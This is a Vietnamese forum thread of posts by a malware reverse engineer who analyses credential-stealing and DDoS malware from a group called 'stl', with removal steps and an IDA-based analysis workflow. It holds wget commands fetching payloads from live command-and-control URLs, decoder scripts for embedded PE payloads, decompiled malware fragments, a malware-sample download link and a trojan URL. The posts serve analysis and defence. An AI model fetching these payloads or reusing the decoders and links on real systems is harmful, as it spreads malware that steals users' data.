Messages posted by: TQN

Vậy là mừng đó em, nếu KIS thịt hết thì tốt chứ sao !
Còn mấy file mạo danh của stl hay lỡ có trùng đi nữa, nếu em có xoá thì chả chết thằng Tây đen nào cả, computer của em vẫn hoạt động bình thường.
Khi em mạo danh, em sẽ mạo danh thằng nào là core của system, nếu user xoá lầm (hay xoá được) thì chỉ có nước Ghost hay format, install lại thôi. Còn "mèo què" của stl thì cứ mạo danh mấy cái updater, mấy cái fake linh tinh, xoá đi không sao cã.
Còn về mã MD5, thì không được em à, mã MD5 chỉ xác định trên một mẫu duy nhất, còn trong khi đó, cũng cùng một mẫu của stl, cùng tên luôn, lại có vô số biến thể. Nên đừng care về MD5, cứ gặp là taskkill xong rồi xoá đi. Em dám chắc 100% là xoá xong chả bị gì cả, thậm chí nhẹ máy hơn, ít tốn băng thông hơn.

Các cậu nào có GoogleCrashHandler.exe vui lòng up lên MF chẵng hạn để anh em RE team xem thử GoogleCrashHandler.exe có bao nhiêu biến thể rồi ! Gấp nhé !

Nhiều người cứ hỏi, vd như trên, GoogleCrashHandler.exe là file của Google, thì làm sao lại là mèo què của stl được:
1. Khi em dùng VC++ hay bất cứ trình compiler nào: Java, VB, Delphi, CBuilder..., em có thể build ra bất kỳ file .exe, .dll nào trùng tên với mấy cái file .exe, .dll nổi tiếng, phổ biến của các cty phần mềm nổi tiếng. Thậm chí, em sẽ build thành ThangCuAnh.exe, sau đó em ra ngoài console, Explorer, rename thành GoogleCrashHandler.exe, AcrobatUpdater.exe, StaticCaches.dat, History.db ( quen không stl coder ?)... cũng được. Tên không quan trọng, quan trọng là code bên trong của nó, cấu trúc file bên trong của nó.
2. Các file chính quy của Google, ITunes, Apple, Sun... đa số đều có Digital Signature, phong cách code rất sáng sủa, chiều thì trong sáng, không mập mờ, lằng ngoằng như mèo què của stl !
3. stl coder không dùng các kỹ thuật anti AV, anti VM... phổ biến mà giới cao thủ VX thế giới dùng. Thay vào đó, chúng cố gắng code từng module của chúng thật "nai", nhưng cộng 3, 4 con "nai" thì thành con cáo, con mèo què !!!??? Vì vậy, các AV và chúng ta khi xem xét, phân tích từng module 1 của đám mèo què đó thì chưa thấy được mối nguy hiểm của nó. Vd gần nhất là mẫu QTTask.zip mà em vừa up lên, một đống module, cấu kết với nhau, IPC connect với nhau bằng Pipe, bằng Memory Mapping File API để lấy cắp thông tin victim up về một vài HTTP server và down mèo què mới về !

1. Start -> Run -> gõ Cmd
2. Gõ trong console window: taskkill /F /IM GoogleCrashHandler.exe /T
3. Download autoruns.exe từ http://technet.microsoft.com/en-us/sysinternals/bb963902, tìm GoogleCrashHander.exe ở đâu, right click, xoá đi.
4. Up mẫu GoogleCrashHandler.exe đó lên đâu đó cho anh em RE team của HVA phân tích. Up xong rồi xoá nó đi.
5. Xong, cho một con bot nữa của stl đi die cho rồi, thử xem thằng coder "mèo què" với thằng RCE, up mẫu cho AV, thằng nào nhanh hơn, hiệu quả hơn, thằng đó thắng !

Nhắc với anh em stl coder, đã pure C, pure API thì pure cho trót, đừng có lượm lặt đâu trên Internet, thấy có vài hàm dùng được, nhưng lại có dùng CString, thì đừng có cố mà mang vào. Em RCE mà thấy ngớ ngẫn lắm, vì khi mấy anh dùng tới CString, thì anh phải mang theo ít nhất 2,3 chục hàm internal của CString, của MFC, ATL.

Bà con cứ open mấy file .idb trong QTTask.zip của em ra sẽ thấy, các hàm CString chỉ dùng cho duy nhất trong 1 hàm nào đó của mấy anh coder stl tự code. Code vậy thì hơi bị ngớ ngẫn đấy ! Ví dụ hàm EnsureDirs trong file .idb nào đó, hay hàm compare Process Name = Upper case của mấy anh stl, không không đang đi cao tốc lại rẽ đi vào đường quốc lộ, đường nông thôn. Làm em RCE cũng mệt đứ đừ, cứ tự hỏi, quái, làm cái gì vầy trời, có khùng không trời !

Em viết ra như trên thì chắc sẽ có nhiều người không đồng ý với em, cho là em tự cao tự đại, kiêu ngạo gì đó, vân vân và vân vân... ! Em không phải vậy, phân tích ra vậy, nói ra vậy để mọi người hiểu, về phương diện code, coder, stl cũng chỉ là những thằng bình thường, chỉ là nhưng newbie hay immediate level thôi, chả phải là thần thánh, hung thần gì cả, không có gì mà phải sợ tụi nó, và tụi này, từng thành viên cũng bình thường về trình độ như chúng ta thôi, chả giỏi hơn cái gì cả, chả phải "du côn học sinh" về giỏi hơn chúng ta ! Về phương diện kỹ thuật, tụi này cũng "phình phường" thôi, mọi người có kinh nghiệm RCE, VC++ coding một chút sẽ hiểu được code của tụi nó, hiểu được tụi nó nghỉ gì, muốn gì khi code con "mèo què" đó !
Điểm thứ hai, hầu hết mèo què của stl, dòng nào theo dòng đó (nằm vùng, ăn cắp thông tin, downloader, bot..), chỉ có một base code (code gốc) duy nhất theo dòng đó, khác nhau duy nhất chỉ là mấy cái string hardcode, encrypt, mấy cái thuật toán mã hoá, giãi mã khác nhau, mấy cái URL khác nhau thôi. Còn lại thì như anh chị em sinh đôi hết. Em nói đúng không mấy anh stl ? Mấy anh gần cạn hết mẫu rồi mà, phải không ?

Chúng ta đang làm đúng, danh chánh ngôn thuận, đang đấu tranh với tệ nạn xã hội, tội phạm xã hội, tội phạm dùng công nghệ cao "hơi hơi", chả có gì phải sợ, phải giấu mặt với chúng hết ! Nếu chúng ta sợ hãi, chúng ta giấu mặt khi nói tới tụi nó, vô tình chúng ta làm chúng nghĩ rằng ai cũng sợ tụi nó, sợ thế lực đứng sau lưng tụi nó ! Sau này chúng sẽ càng hoành hoành, tác oai, tác quái, khống chế hết mọi thứ ! Lúc đó, tự do cá nhân, tự do IT, tự do Internet, tự do phát ngôn, tự do tìm hiểu thông tin mà Hiến Pháp VN ta quy định có còn không ?

PS: Ngày hôm nay chạy cái xe cùi gần 100 km, về nhà, mệt đứ đừ, đọc mấy cái post thấy bức xúc quá !

Đừng lạc đề các bạn ! Chúng ta nên tập trung vào việc tìm mẫu. Ngoài mẫu iTunesHelper.exe và GoogleCrashHanlder.exe mà chúng ta đã biết là đã từng DDOS VNN, tui tin chắc vẫn còn mẫu nằm vùng khác và mẫu bot khác đang DDOS VNN. Mong các bạn tiếp tục truy tìm, monitor, theo dõi.
Để dùng các trình packet capture, các bạn chịu khó tắt trình duyệt, tắt hết các autoruns có digital signature, được verified, dùng các tool Wireshark, SmSniff, NetwordMiner, TcpView... để capture. Cứ để máy chạy khoảng 2-3h, xem process nào dùng HTTP protocol, port 80 connect tới VNN (Do mấy anh stl coder cứ thích dùng API Sleep, ngủ thiệt lâu rồi mới dập).
Còn mấy mẫu nằm vùng, ăn cắp thông tin của máy victim, tui đã RCE gần xong. Khi nào xong, tui sẽ post chi tiết phân tích và nhờ các bạn up mẫu lên các AVs. Dẹp hết cái đám nằm vùng này thì bot để DDOS sẽ không còn, không ai còn bị "bạch hoá" nữa, cho tui stl thành "dầu hắc hoá" luôn smilie

PS: Em xin nhắc lại, tụi stl này không đáng được viết hoa, bà con viết thường thành "stl" giùm em cái ! STL chỉ dành riêng cho C++ Standard Template Library thôi, còn "stl" thì bà con muốn đọc nhái thành gì cũng được !

Và cũng có một điều nữa nên nói luôn: stl đã gần như cạn kiệt mẫu "mèo què" rồi, tụi nó chỉ dùng lại các mẫu cũ, xào đi nấu lại, thêm mắm muối đôi chút. Ngay cả mẫu tui đang cố RCE hoàn chỉnh 100% thì cũng là code cũ của bộ Đao 360 độ chế lại thôi. Mấy anh dùng Đao 360 thì em dùng AK để phang, coi Đao sợ hay súng sợ smilie

Hầu hết các mẫu của tụi này được viết vào năm 2010, "mèo què" 2011 rất ít.
Bà con nào code hệ thống, malware được chuẩn bị có đợt tuyển malware coder mới vào 2012 nhé ! Cho em tham gia với, đang thất nghiệp coding đây, mấy anh stl ơi ơi !

Mẫu nằm vùng, ăn cắp thông tin nạn nhân để "bạch hoá", tui up ở đây: http://www.mediafire.com/?259kv56xit09c6b, password: infected, nằm chung trong thư mục này: http://www.mediafire.com/?tz745o0f678w8
Bà con xem trong file đó, có file nào tồn tại trên máy mình, xoá ngay lập tức giùm em cái, không thì mai mốt đụng tới tụi nó, tụi nó search trong HTTP server xxx của nó, tìm thông tin của bà con rồi public ra là mệt đấy (Chửi sao đây ha !).
Các file .idb là các file IDA 6.1 database, chưa hoàn chỉnh lắm. Bà con nào có IDA 61 có thể mở file .idb đó lên và xem cách thức hoạt động của chúng !

Thôi, tránh lạc đề anh em. Chỉ là bức xúc tình trạng làm ăn gian dối, đạo đức xuống cấp thôi.
Mình chỉ nhắc mấy anh em sv FPT đó là được rồi, bolzano. Mấy em sv FPT đó chịu khó remove cái Form3 ra giùm đi. Kiếm tiền thì nên quang minh chánh đại chứ, đừng làm những hành động vậy. Đã có ý tưởng tốt, viết phần mềm free thì free cho trót !
Em nhớ hồi xưa ông thầy dạy Anh Văn hồi PT của em có chế một câu: "Nhân bất học bất chi lý, trẻ không học lớn lên chích ma tuý, mình có học lớn lên làm đại uý" smilie

Đùa một chút cho mọi anh em bớt căng thẳng.
PS: Tình trạng cài cắm virus, malwares, thật giả lẫn lộn giờ nhiều quá rồi. Em đi nhậu mà cũng không biết tin thằng bạn nhậu nào cả ! Cứ nghĩ trong đầu, mẹ, không biết nó có phải là thành viên stl không ? smilie

Thôi quay lại tìm con bot giấu mặt đang "đốt" VNN anh em nhé !

Nhắc nhở bạn Mr.SuperCat xoá ngay mấy cái link đó đi nhé. Tội lợi dụng diển đàn để phát tán AutoIt trojan missAu.exe rồi down svchost.exe từ http://boyvippro.net/store/schost là bị ban đấy.

Tôi nghi ngờ vẫn còn mẫu nào khác, trong hay ngoài nước, đang âm thâm DDOS Vietnamnet. Mong bà con chung tay tìm và tiêu diệt mạng botnet này.

PS: Tôi biết Vietnamnet từ lâu rồi, chắc khoãng năm 1999, lúc đó forum đầu tiên về IT mà tui tham gia chính là forum của VNN. Lúc đó tôi làm mod box lập trình C/C++/Delphi... Nhanh thật, hơn 10 năm đã qua rồi. Giờ tham gia đóng góp 1 chút công sức nhỏ cho VNN cũng đáng !

Sự gian dối, lừa đão, bằng mọi cách đạp đầu người khác để đi lên càng ngày càng phổ biến và lộ rõ.
Sáng nay, duyệt facebook, thấy cái link phần mềm ToiTietKiem.Vn_Professional bị nghi ngờ có trojan, tui down về phân tích thử. Quả đúng không sai: một phần mềm rất tệ, trái ngược hẳn với quảng cáo rầm rộ, của nhóm sv của FPT, đã đoạt giải gì đó, lại cài cắm click adware trong đó.
Đây chỉ là một đoạn link click của linkbucks.com mà ct này nhúng vào, dùng Form3 với 4 component WebBrowser để tự động gọi method Click. Form3 được tác giả hide đi nên chúng ta sẽ không thấy trên màn hình:
Code:

http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://2050aad9.linkbucks.com
 http://d27332b6.linkbucks.com
 http://052162c8.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://7d67a321.linkbucks.com
 http://3060e20c.linkbucks.com
 http://ac9ee037.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://4d6e46fd.linkbucks.com
 http://4a6045bc.linkbucks.com
 http://f00ee973.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://b9e8ccfb.linkbucks.com
 http://0779dfd9.linkbucks.com
 http://82883b02.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://a14a1ab3.linkbucks.com
 http://6590b68a.linkbucks.com
 http://c603c304.linkbucks.com
 http://d332db80.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://5fffee9b.linkbucks.com
 http://bfbf5fab.linkbucks.com
 http://438e215b.linkbucks.com
 http://1ec41b10.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://54a960f9.linkbucks.com
 http://d3125c51.linkbucks.com
 http://aa3cee9a.linkbucks.com
 http://40df7943.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://6fcc3f8e.linkbucks.com
 http://141e8889.linkbucks.com
 http://8464fce6.linkbucks.com

Download phần mềm này tại: http://www.toitietkiem.vn/sites/default/files/ToiTietKiem.Vn%20Professional%20Setup.rar
Chỉ biết bó 3 chân.com. Càng lúc càng loạn ! Không biết FPT và Toyota có biết là phần mềm và nhóm sv này đã làm điều bậy bạ này không, có đáng để họ khen thưởng, tung hô không ?

PS: Không không chắc sẽ có nhiều người ghét mình, coi mình là kẽ "chọc gậy bánh xe" quá smilie

Ngoài mẫu iTunesHelper.exe đã bị các AV diệt, tui nghĩ có thể vẫn còn có mẫu nào đó đang DDOS Vietnamnet mà chúng ta chưa biết. Vẫn tiếp tục nhờ các bạn dùng Wireshark, SmartSniff để monitor và up mẫu.
Kết quả tracker.cmd của tui vừa tức thì:
Code:

--2011-09-18 19:52:37--  http://wide.ircop.cn/index.txt?113
Resolving wide.ircop.cn... 200.74.244.197
Connecting to wide.ircop.cn|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:38--  http://pref.firebay.cn/index.txt?113
Resolving pref.firebay.cn... 200.74.244.197
Connecting to pref.firebay.cn|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:39--  http://daily.leteaks.com/index.txt?113
Resolving daily.leteaks.com... 200.74.244.197
Connecting to daily.leteaks.com|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:40--  http://link.susaks.com/index.txt?113
Resolving link.susaks.com... 200.74.244.198
Connecting to link.susaks.com|200.74.244.198|:80... failed: Connection refused.
--2011-09-18 19:52:41--  http://option.drfound.net/k113.css
Resolving option.drfound.net... 204.12.220.181, 94.242.203.16
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Retrying.
--2011-09-18 19:53:23-- (try: 2)  http://option.drfound.net/k113.css
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Retrying.
--2011-09-18 19:54:05-- (try: 3)  http://option.drfound.net/k113.css
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Giving up.

Vào http://pref.firebay.cn và http://pref.firebay.cn thì lại thấy là website của công ty Hanover Company Store, LLC, hình như bán vải, gối, mền. Quái, mấy anh stl chuyển nghề qua buôn bán à smilie

Cũng không bận lắm đâu, đang thất nghiệp mà. Nhưng thật ra giờ hết hứng thú với mấy anh stl nữa nên không muốn tham gia thêm.
Em đang RCE mẫu "người tình cũ" của mấy anh stl gởi nhờ vào máy em năm ngoái. Lâu lâu móc ra phân tích một chút. Thấy có nhiều điều thú vị lắm !
Lắm lúc phân tích cái đống "mèo què" này, cứ tự hỏi, quái, thằng coder này khùng à, viết tầm bậy bạ à. Nhưng đọc kỹ, suy nghĩ kỹ thì không dám "khùng" đâu, thâm độc thiệt !

Vd mẫu DrWatson.dll em đang phân tích đây, Size = 19 KB (121,856 bytes), thấy nó có vẻ được code ra để đánh thẳng vào đối tượng là người dùng Laptop: Vista hay Win7, có install AVG.

Vừa vào, trước khi lây nhiểm nó đã cắm đầu đi suspend (chứ không kill, các bạn để ý nhé) AVGIDSAgent.Exe, không cần biết là có AVGIDSAgent.exe hay không. Nó suspend bằng cách dùng các hàm Thread32First/Next... của ToolHlp32 API để suspend tất cả thread của process.

Sau đó, nó lấy Windows version để xác định Windows user đang install có newer hơn WinXP không:
Code:

text:10001431 @@CheckWinVer: ; CODE XREF: PrepareDebugSymbolW+304j
.text:10001431 1E8C cmp [ebp+dwVerMajor], 5
.text:10001438 1E8C ja short @@NewerThanWinXP
.text:10001438
.text:1000143A 1E8C cmp [ebp+dwVerMinor], 1
.text:10001441 1E8C ja short @@NewerThanWinXP
.text:10001441
.text:10001443 1E8C mov [ebp+bInjectToExplorer], 0
.text:1000144A 1E8C jmp short @@j_CanInjectToExplorer
.text:1000144A

Nếu là WinXP trở xuống thì nó sẽ thoát, không làm thêm gì cả !

Vì vậy, em rút kinh nghiệm từ giờ luôn, không bao giờ tiết lộ cho ai biết về máy tính, Win ver, AV, Firewall mà mình đang dùng, cả trên các forum hay bờ lốc, bờ liếc....

Người ta nói, tình cũ không rủ củng tới, quả là đúng thật ! Gần một năm rồi, em lại gặp bộ mèo què biến thể của mấy anh stl, bộ nằm vùng, ăn cắp thông tin ấy, đâu xa, trong máy laptop bà chị ruột thân yêu của mình luôn (Quá quắt !!!). Code y như Đao 360 ngày trước, cũng là bao nhiêu đó code, xào đi nấu lại, mạo danh tên khác. Bộ Đao 360 đó, em đã tạm gác lại vì phải theo các mẫu bot, DDOS tool của mấy anh trong một thời gian dài vừa qua. Hồi đó, secmask đã phân tích sơ bộ, rất hay và chính xác, nhưng chưa đủ 100%, vì chưa tìm ra điểm quan trọng, chính là cái host và phương thức mà các anh up thông tin của victim, dùng HTTP protocol về cái host đấy. Nhưng lần này thì không, em phải làm cho tới nơi tới chốn luôn ! Đâu nhiều đâu, 7-8 PE chứ mấy:
Code:

1. Downloader.exe: quá nhiều nguồn lấy về, mấy cái tracker.cmd cùi bắp dùng wget của em cũng chụp được.
2. QTTask.exe
3. QTTask.dll
4. rfc2616.exe
4. drwtsn32.exe
5. c6to4.dll
6. cversions.2.db
7. DrWatson.dll
8. rdpuser.mof

Lần này, em chả công bố gì cả, buồn buồn thì móc ra, analysing 1 vài hàm cho vui, RCE đầy đủ, rõ ràng, chậm mà chắc, chả ai ép mình về tiến độ, thời gian, chất lượng, tính pháp lý của công việc cả ???!!! Thích thì làm, không thích thì thôi. Em quyết tìm ra đầy đủ lý do tại sao hồi đó em bị mất toàn bộ username, password ! StaticCaches.dat chỉ là một phần nhỏ, phải không mấy anh stl ? Hồi đó mấy anh nói em chỉ RCE được 40%, qua một thời gian dài vừa qua, em promote lên được bao nhiêu % rồi, mấy anh stl ? Bộ mà em đang RCE, em nói trước, các AVs đã nhận mẫu và IDA database rồi, không công bố, chỉ âm thầm cập nhật, phân tích, theo dõi. Các anh stl nên hy sinh nó đi là vừa, nói thật và chân thành đấy ! Làm gì thì làm, đừng có cài cắm trojan ăn cắp thông tin trên máy victim, là máy của mọi người dân lương thiện, hiền lành, vô tội của Viêt Nam là được rồi !

Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết:
1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea
2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems
Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ?
Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !?
Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ?

Chuyện tranh luận với bạn s3ll (sell), tôi không quan tâm. 10 người 11 ý. Không ai cấm ai suy nghĩ, phát biểu theo ý này ý kia được.
Tôi cũng như bạn s3ll, lúc chiều đó uống sương sương mấy chai, tối lên mạng chửi bậy vài câu. Sáng ra tỉnh thì edit lại ngay. Tửu nhập ngôn xuất mà, phải không anh em smilie

Em thì sợ mấy hệ thống phân tích tự động này lắm rồi. Bao nhiêu mẫu mèo què của stl coder up lên, đi qua các hệ thống dạng này, đều 99% là clean hết. Phải mail, năn nỉ, thuyết phục thì tụi AVs đó mới manual analysis.
Không có máy móc nào đủ thông minh bằng con người cả, nhưng con người cũng không "trâu bò" bằng máy móc được. Nên phải kết hợp cả hai !

Bó tay chấm com. Tìm đọc những cuốn sách về RCE và malware analyze sẽ sáng hơn nhiều vấn đề.

Quan trọng: cậu có biết và đã lập trình chưa ? Coder ấy ! Nếu RCE mà không biết code, không biết đào sâu vào bên dưới OS, compiler thì khó mà tiến sâu được. Cậu phải đặt mình vào vị trí thằng coder con malware ấy mới được.

Vd nhé, gặp một mẫu mới của mấy anh em stl quen thuộc:
1. Xác định mấy anh em coder đó dùng VC++ ver nào: quanh đi quẫn lại chỉ là VC++2008, 2010 thôi, hiếm khi mấy anh ấy dùng VC++ 2005. VC++6 thì tuyệt nhiên không, chỉ vừa rồi Drwatson32.exe của mấy anh ấy

2. Dùng PEView, ResHacker, PE Explorer kiểm tra sơ bộ xem mấy anh ấy có sơ hở, để lộ gì không trong quá trình mấy anh ấy build.

3. Dùng PEid + Kanal plugin, Crypto Scanner, GUID scanner, sigsrch scan.... detect xem mấy anh ấy dùng thuật toán gì để mã hoá, encode các thông tin quan trọng. Cho các tool ấy export ra các thông tin crypto dưới dạng .log hay .idc

4. Open malware của mấy anh với IDA, apply các signature tương ứng hay gần giống với với compiler VC++ mà mấy anh ấy dùng. Đồng thời, dùng OllyDbg, analysis code mấy anh ấy với các lib file tương ứng với compiler đó. Dùng thêm các plugin ComHelper2.plw, ClassInformer, Fubar....

5. Apply bằng tay hay tự động các idc, .log file, .txt mà các tool ở bước 3 sinh ra.

6. Run ms_ehsc.idc để find và reformat các exception handler của C+C++ trong code của mấy malware đó.

7. Dựa vào kết quả của Class Informer plugin, xây dựng lại vtable, layout của các class mà coder của stl dùng.

8. Bước quan trọng nhất, sau khi xác định được compiler version của các con malware mà anh em chúng ta đang phân tích, em tìm các mfcxxx.dll, msvcxx.dll, atlxxx.dll tương ứng với các compiler đó, get debugger symbol file từ MS server về, mở các file đó trong IDA, apply auto hay manual các .pdb đó. Sau đó lưu thành file xxxdiff.idb.

9. Dùng PatchDiff2 plugin hay DarunGrim plugin, compare idb file của con malware mà chúng ta đang phân tích với các .idb trên, tập trung vào Match function và Identical function. Đồng thời mở thư mục Source của Visual Studio tương ứng với ver của con malware đó (VS 2005, 2008, 2010...) để apply name, comment, symbol... từ library của VC sang idb của con malware đó.

10. Đánh dấu tất cả các hàm match, identical là library function. Số còn lại là code của mấy anh em stl đó và code inline của các 3rd library function, VC++

11. Dựa vào kết quả của ClassInformer, các hard code string, search Google xem mấy anh stl coder chôm và xài open source nào, download cái open source đó về, chịu khó mày mò và apply bằng tay hay diff trên idb file của .lib, .dll của open source đó để xác định tiếp các hàm của open source.

12. Còn lại, chỉ là code của stl coder hay các hàm inline của std, CString... library. Tiếp tục, build một app nhỏ dùng càng nhiều càng tốt các hàm của std::string, ATL/MFC:CString, build ở mode Release, Debug Symbol, và dùng các option compiler/linker tương tự như code của malware, aplly diff lần nữa. File compiler/build này để dành dùng về sau.

13. Sau khi diff bước 12 xong, loại ra tiếp các hàm inline của Standard Template Library (std, stl), CString function. 100% còn lại là code đích thực của mấy coder stl.

14. Quan trọng nhất, dùng HexRays plugin để decompiler các code, các function của stl coder. Chịu khó name, comment đầy đủ.

15. Sau này, gặp con khác, nếu cùng compiler/linker version của con trên, chúng ta có thể bỏ qua 14 bước trên, dùng PatchDiff, DarunGrim để compare và apply trực tiếp malware này và malware kia ! Thật ra VC++ 2005, 2008, 2010 sinh code cũng na ná nhau, nếu đã từng build, debug, IDA các code đó nhìn là thấy liền.

STL coder chủ yếu dùng các open source sau: CryptoPP, Zlib, libcurl, Socks45.... Bao nhiêu đó đủ để anh em RCE ra gần như 95% code của stl coder rồi.

Vd như con mạo danh DrWatson của mấy anh stl trước và sau này, trong 88 hàm mà IDA và em force tìm ra,chỉ có 3 hàm là của mấy anh ấy tự code, còn 85 hàm còn lại là hàm library của VC++ 2008. Nhìn thấy ngay 3 hàm đó, nằm ngay đầu tiên của .text section. HexRays F5 cho các hàm đó là ra pesudo-code C/C++. Ngồi rename, type,comment một chút nữa là ra ngay code 99% nguyên thuỷ của mấy anh ấy.

Và quan trọng nữa (sao nhiều quan trong thế): Tìm và đọc các topic, article về Reversing C++, về RTTI của C++, về exception handler của C++ (chủ yếu là nói về MS VC++ compiler).

Đôi khi em mong mấy anh stl code mèo què = Delphi, em khoẻ biết mấy !

Vài lời comment với anh em, hy vọng anh em đọc không thấy lùng bùng con mắt. Thông cảm, em viết văn tệ lắm smilie

Lỗi thì cả trăm ngàn lỗi. Thông thường các coder hay đổ thừa do OS, compiler..., chứ không bao giờ nhận là lổi của mình.

Hì hì, lần này em gặp cục xương khó gặm nhất, bự bà cố luôn. Bao nhiêu tinh tuý của mấy anh stl dồn hết vào cái file rfc2616.txt này à ? Mình nó mang trong bụng gần 5-6 PE file vậy ? Hay lắm, size của rfc2616.txt sau khi decode ra chỉ vỏn vẹn 476KB.
Nói mấy anh stl không tin, sợ em nói dóc. Thôi em gởi mấy anh vài đoạn script sau đọc đỡ buồn:
Code:

//-------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeRfcTxt.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.0
// Purpose: Decode the Rfcxxx.txt files downloaded from:
// 1. http://news.pedto.com/rfc1945.txt
// 2. http://blogs.pinix.org/rfc1945.txt
// 3. http://analytics.dynn.info/rfc1945.txt
// 4. http://news.pedto.com/rfc2616.txt
// 5. http://blogs.pinix.org/rfc2616.txt
// 6. http://analytics.dynn.info/rfc2616.txt
//-------------------------------------------------------------
int i, j, size = FileSize();
if (size <= 0)
{
MessageBox(idOk, "DecodeRfcTxt", "No file loaded or file empty.");
return -1;
}
// Modify from 8th byte
for (i = 0, j = 0; i < size; i += 2, ++j)
{
// Modify the current byte
WriteUByte(j, ReadUByte(i) - 65 + 26 * (ReadUByte(i + 1) - 65));
}
DeleteBytes(j, size);

Thêm cái script này nữa:
Code:

//----------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeRwoqv.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.1
// Purpose: Decode and extract the embedded PE files in rwoqv.exe
//----------------------------------------------------------------
char Mask[] = "ï¾ÞNullsoftInst '";
char strBin[255];
int i, j, iFiles, curFile, newFile;
int64 liPos, fSize;
// Check that a file is open
if (FileCount() == 0)
{
MessageBox(idOk, "DecodeBin", "DecodeBin can only be executed when a file is loaded.");
return -1;
}
// Save the file index of current file
curFile = GetFileNum();
// Find the embedded PE files
liPos = FindFirst(Mask);
if (liPos < 0)
{
MessageBox(idOk, "DecodeBin", "Could not find the mask of embedded PE files");
return -1;
}
liPos += 20;
liPos += 0x100; // stl coder modified code here
iFiles = ReadInt(liPos);
liPos += sizeof(int);
Printf("Number of embedded PE files %d - Start at 0x%LX", iFiles, liPos);
for (i = 0; i < iFiles; ++i)
{
fSize = ReadInt(liPos);
liPos += sizeof(int);
SetSelection(liPos, fSize);
CopyToClipboard();
newFile = FileNew();
FileSelect(newFile); // force select new file
PasteFromClipboard();
// Decode the new file
for (j = 0; j < FileSize(); ++j)
{
// Modify the current byte
WriteUByte(j, ReadUByte(j) ^ (( j & 7) + 0x3E)); // stl coder modified code here
}
SPrintf(strBin, "File%d.bin", i + 1);
strBin = InputSaveFileName("Save decoded PE as", "All files (*.*)", strBin, ".bin");
FileSave(strBin);
// Switch to old file
FileSelect(curFile);
// Seek to next embedded PE file
liPos += fSize;
}

Và cái tracker.cmd cùi bắp luôn:
Code:

@echo off
echo ==================================================================================================
echo Download cac file trojan, bot va DDOS config files cua stl malwares mao danh soft cua QuickTime
echo Cac ban gap 2 file nay: QTTask.exe va QTTask.dll thi kill va xoa ngay !!!!!!!!!!!!!!!!!!!!!!!!!!!!
echo ===================================================================================================
echo.
wget -t3 "http://news.pedto.com/rfc1945.txt" -O news.pedto.com_rfc1945.txt
wget -t3 "http://blogs.pinix.org/rfc1945.txt" -O blogs.pinix.org_rfc1945.txt
wget -t3 "http://analytics.dynn.info/rfc1945.txt" -O analytics.dynn.info_rfc1945.txt
wget -t3 "http://news.pedto.com/rfc2616.txt" -O news.pedto.com_rfc2616.txt
wget -t3 "http://blogs.pinix.org/rfc2616.txt" -O blogs.pinix.org_rfc2616.txt
wget -t3 "http://analytics.dynn.info/rfc2616.txt" -O analytics.dynn.info_rfc2616.txt
pause

Có một đoạn code này, em vừa đọc vừa cười muốn bể bụng. Đoạn code này mới 100%, vừa được mấy anh stl nhét thêm vào cái codebase *.manifest của mấy anh ấy.
Code:

void __stdcall DetectHijackthisExe(int a1)
{
HANDLE hSnapshot; // esi@2
PROCESSENTRY32W pe; // [sp+10h] [bp-230h]@1
unsigned int sanity; // [sp+23Ch] [bp-4h]@1
sanity = (unsigned int)&pe ^ __security_cookie;
while ( 1 )
{
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
memset(&pe.cntUsage, 0, 0x228u);
pe.dwSize = 556;
if ( Process32FirstW(hSnapshot, &pe) )
{
do
{
if ( !lstrcmpiW(pe.szExeFile, L"hijackthis.exe") )
ExitProcess(0);
}
while ( Process32NextW(hSnapshot, &pe) );
}
CloseHandle(hSnapshot);
Sleep(0xC8u);
}
}

Tính làm cho Bolzano nhà ta thất nghiệp ha ? Nhưng lại code ngớ ngẩn như vậy: detect thấy hijackthis.exe, thay vì kill process hijackthis.exe thì chính mình lại đi exit.

